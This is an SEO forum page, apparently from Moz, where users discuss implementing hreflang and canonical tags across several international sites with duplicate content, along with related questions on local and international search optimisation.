Implementation advice on fighting international duplicate content
-
Hi All,
Let me start by explaining that I am aware of the rel="canonical" and **rel="alternate" hreflang="x"** tags, but I need advice on implementation.
The situation is that we have 5 sites with similar content. Out of these 5:
- 2 use the same URL structure and have no suffix
- 2 have a different URL structure with a .html suffix
- 1 has an entirely different URL structure with a .asp suffix
The sites are quite big, so it will take a lot of work to go through and add rel="alternate" hreflang="x" tags to every single page (as we know, the tag should be applied at the page level, not the site level).
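For anyone unfamiliar, the page-level annotations we are talking about look roughly like this (the URLs here are just placeholders):

```html
<!-- In the <head> of each page, one line per language/country version (hypothetical URLs) -->
<link rel="alternate" hreflang="en-gb" href="https://www.example.co.uk/widgets/" />
<link rel="alternate" hreflang="en-us" href="https://www.example.com/widgets.html" />
<link rel="alternate" hreflang="en-sg" href="https://www.example.asia/widgets.asp" />
```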
Four of the five sites are managed by us and already have the tag implemented, which makes things easier, but the fifth is managed in Asia and we fear that the amount of manual work required will put them off implementing it. The site is due to launch at the end of the month, and we need to sort this issue out before it goes live so that we are not penalised for duplicate content.
Is there an easy way to go about this, or is manual addition the only way?
Has anyone had a similar experience?
Your advice will be greatly appreciated.
Many thanks,
Emeka.
-
Unfortunately yes, the process needs to be re-run with the tool each time a new page is added.
-
Thanks Gianluca,
Have you had experience using the tool above? Presumably each time a new page is added to the site the tool would have to be run again?
I agree that an in-house solution would be best, but given the time limit we are open to ideas.
I appreciate your response.
Emeka.
-
When it comes to massive sites and hreflang annotations, the ideal solution is to implement hreflang using the sitemap.xml method.
It is explained here by Google: https://support.google.com/webmasters/answer/2620865?hl=en.
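In short, instead of tagging every page's HTML, each URL entry in the sitemap lists all of its alternate versions. A minimal sketch of the format, with made-up URLs:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
        xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <url>
    <loc>https://www.example.co.uk/widgets/</loc>
    <!-- Every version lists the full set of alternates, including itself -->
    <xhtml:link rel="alternate" hreflang="en-gb" href="https://www.example.co.uk/widgets/" />
    <xhtml:link rel="alternate" hreflang="en-us" href="https://www.example.com/widgets.html" />
    <xhtml:link rel="alternate" hreflang="en-sg" href="https://www.example.asia/widgets.asp" />
  </url>
  <!-- ...repeat a <url> block with its alternates for every other URL -->
</urlset>
```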
A tool that makes it easier to implement hreflang in a sitemap file is the one The Mediaflow created:
http://www.themediaflow.com/tool_hreflang.php.
Right now, that is the only tool I know of for this kind of task, so you could also consider building an in-house solution if you have internal developers who can be dedicated to it.
Related Questions
-
International SEO - How do I show correct SERP results in the UK and US?
Hi, Moz community. I hope you're all OK and keeping busy during this difficult period. I have a few questions about international SEO, specifically when it comes to ranking pages in the UK and the US simultaneously. We currently have two websites set up which are aimed towards their respective countries: a '.com' and a '.com/us'. If anybody could help with the issues below, I would be very grateful. Thank you all.
**Issues**
- When looking at US Google search with a VPN, the title tag for our UK page appears in the SERP, e.g. I will see: UK [Product Name] | [Brand]
- When checking the Google cache, the UK page version also appears.
- This can cause a problem, especially when I am creating title tags and meta descriptions that are unique from the UK versions.
- However, when clicking through from the SERP link to the actual page, the US page appears as it should do. I find it very bizarre that it shows you the US page when you click through, but you see the UK version in the SERP when looking at the overall search results.
**Current set-up**
- Our UK and US page content is often very similar across our ".com" and ".com/us" websites, and our US pages are canonicalised to their UK page versions to remove potential penalisation.
- We have also added hreflang to our UK and US pages.
**Query**
How do I show our US SERP as opposed to the UK version in US Google search?
**My theories/answers**
- US page versions have to be completely unique, with content related to US search intent, and be indexed separately - therefore no longer canonicalised to the UK version.
- Ensure hreflang is enabled to point Google to the correct local page versions.
- Ensure local backlinks point to localised pages.
If anyone can help, it will be much appreciated. Many thanks all.
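To make the first theory concrete, the usual pattern for pages that should rank in both countries is a self-referencing canonical on each version plus reciprocal hreflang annotations; a cross-site canonical asks Google to index only the UK URL, which fits the symptom described above. A rough sketch with placeholder URLs:

```html
<!-- Hypothetical <head> of the US version at https://www.example.com/us/product/ -->
<!-- Self-referencing canonical: each country version points at itself -->
<link rel="canonical" href="https://www.example.com/us/product/" />
<!-- Reciprocal hreflang, repeated on the UK version as well -->
<link rel="alternate" hreflang="en-us" href="https://www.example.com/us/product/" />
<link rel="alternate" hreflang="en-gb" href="https://www.example.com/product/" />
<link rel="alternate" hreflang="x-default" href="https://www.example.com/product/" />
```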
Local Website Optimization | Katarina-Borovska0
-
Has Anyone Successfully implemented SpecialAnnouncement Schema?
Hello, I'm in the process of updating my clients' websites with the SpecialAnnouncement schema type, and I'm wondering if anyone has successfully done so yet, and whether or not they're seeing any kind of results / rich snippets directly in SERPs from it?
Also, has anyone else run into issues checking their schema with Google's Structured Data Testing Tool? Sometimes I get an error saying "specialAnnouncement is not a type known to Google," and sometimes I get one saying that "the property datePosted is not recognized by Google for an object of type SpecialAnnouncement." I assume these errors are because the schema type is so new, but you know what happens when you assume...
Thank you for any insights!
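For context, a minimal SpecialAnnouncement snippet of the kind being discussed looks something like the sketch below. Every value is a placeholder, and the category URL is the Wikidata entity Google's documentation suggests for COVID-19 announcements:

```html
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "SpecialAnnouncement",
  "name": "Temporary changes to appointments",
  "text": "We are currently offering telehealth consultations only.",
  "datePosted": "2020-05-01T08:00:00-05:00",
  "expires": "2020-08-31T23:59:00-05:00",
  "category": "https://www.wikidata.org/wiki/Q81068910",
  "announcementLocation": {
    "@type": "LocalBusiness",
    "name": "Example Family Practice",
    "url": "https://www.example.com/"
  }
}
</script>
```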
Local Website Optimization | LocalSEOLady0
-
What's the best international URL strategy for my non-profit?
Hi, I have a non-profit organization that advocates for mental health education and treatment. We are considering creating regional chapters of the non-profit in specific countries - France, UK, Russia, etc. What's the best long-term foundation for global organic growth? Should we simply internationalize our content (.org/uk/)? Or create a custom site for each ccTLD (.org.uk, etc.)?
Since it's an educational site, the content for each country would not be particularly unique, apart from:
- Language (regional English nuance for UK and AUS, or other languages altogether)
- Expert videos and potentially supporting articles (i.e., hosting videos and a supporting article for a UK doctor versus a US doctor)
- Offering some regional context when it comes to treatment options, or navigating school, work, etc.
Any thoughts would be much appreciated! Thanks! Aaron
Local Website Optimization | RSR1
-
Duplicate content, hijacked search console, crawl errors, ACCCK.
My company employed a national marketing company to create their site, which was obviously outsourced to the lowest bidder. It looks beautiful, but has a staging site with all duplicate content in the installation. I am not seeing these issues in Search Console, and have had no luck getting the staging site removed from the files. How much should I be banging the drum on this? We have hundreds of high-level crawl errors and over a thousand mid-level. Of course, I was not around to manage the build. I also do not have FTP access.
I'm also dealing with major Search Console issues. The account is proprietarily owned by a local SEO company and I cannot remove the owner, who is there by delegation. The site prefers the www version and does not read the same traffic for the non-www version.
We also have something like 90,000 backlinks from 13 sites, and a shit ton of ghost spam. Help!
Local Website Optimization | beth_thesomersteam0
-
How can I migrate a website's content to a new WP theme, delete the old site, and avoid duplication and other issues?
Hey everyone. I recently took on a side project managing a family member's website (www.donaldtlevinemd.com). I don't want to get too into it, but my relative was roped into two shady digital marketing firms that did nothing but a mix of black-hat SEO (and nothing at all). His site currently runs off a custom WordPress theme which is incompatible with important plugins I want to use for local optimization. I'm also unable to implement responsive design for mobile.
The silver lining is that these previous "content marketers" did no legitimate link building (I'm auditing the link profile now), so I feel comfortable starting fresh. I'm just not technical enough to understand how to go about migrating his domain to a new theme (or creating a new domain altogether). All advice is appreciated! Thanks for your help!
Local Website Optimization | jampaper1
-
Multi-location business - Should I 301 redirect duplicate location pages or alternatively nofollow tag them?
Hello All, I have an eCommerce site and we operate out of multiple locations. We currently have individual location pages for these locations against each of our many categories. On the flip side, however, this creates a lot of duplicate content. All of our location pages, whether unique or duplicated, have a unique title tag, H1, H2 tag and NAP, and they all bring in the city name. The content on the duplicated pages also brings in the city name. We have been going through our categories and writing unique content for our most popular locations to help rank in local search.
Currently I've been setting up 301 redirects for the locations in the categories with the duplicated content, pointing back to the category page. I am wondering whether the increase in the number of 301s will do more harm than having many duplicate location pages. I am sure my site is affected by the Panda algorithm penalty (on the duplicated content issues), as a couple of years ago this didn't matter and we ranked top 3 for pretty much every location, but now we are ranking between 8th and 20th depending on the keyword.
An alternative I thought of, instead of 301ing those location pages with duplicate content, is to put nofollow tags on them instead. What do you think? It's not economically viable to write unique content for every location in every category - this would not only take years but would cost us far too much money. Our site is currently approx. 10,000 pages.
Any thoughts on this would be greatly appreciated. Thanks, Pete
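For illustration only: if the goal is to keep a duplicate location page live but out of the index rather than redirect it, the head-level options are usually a robots noindex (a nofollow alone will not remove it from the index) or a canonical pointing at the main category page. A rough sketch with placeholder URLs:

```html
<!-- Hypothetical duplicate location page: https://www.example.com/widgets/sometown/ -->

<!-- Option A: keep the page live but out of the index; its links can still be followed -->
<meta name="robots" content="noindex, follow">

<!-- Option B: leave it crawlable but consolidate signals onto the main category page -->
<link rel="canonical" href="https://www.example.com/widgets/">
```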
Local Website Optimization | PeteC120
-
Main website and microsite - Do I do Google Places for both, as it will technically be duplicating the locations?
Hi All, I have a main eCommerce website which trades out of a number of locations, and all these locations appear in Google Places, although they don't rank particularly well there. I also have a number of microsites which are specific to one type of product I do, and these rank very well locally.
My question is: should I also do Google Places for my microsites, as this would technically mean I am creating a duplicate location listing in Google Places, but for a different website/business? I only have one Google account, so I guess this would be done under the same Google account?
Thanks, Pete
Local Website Optimization | PeteC120
-
How can I rank my .co.uk using content on my .com?
Hi, We currently have a .com site ranking second for our brand term in the .co.uk SERP. This is mainly because we don't own the exact-match brand term, which comes from not having a clue what we were doing when we set up the company. Would it be possible to outrank this term, considering the weighting that Google puts towards exact matches in the URL?
N.B. - There are a few updates we could do to the homepage to make the on-page optimisation better, and we have not actively done any link building yet, which will obviously help.
Competitor: SERP rank 1 - Moz PA 38, DA 26
Our site: SERP rank 2 - Moz PA 43, DA 32
Thanks, Ben
Local Website Optimization | benjmoz0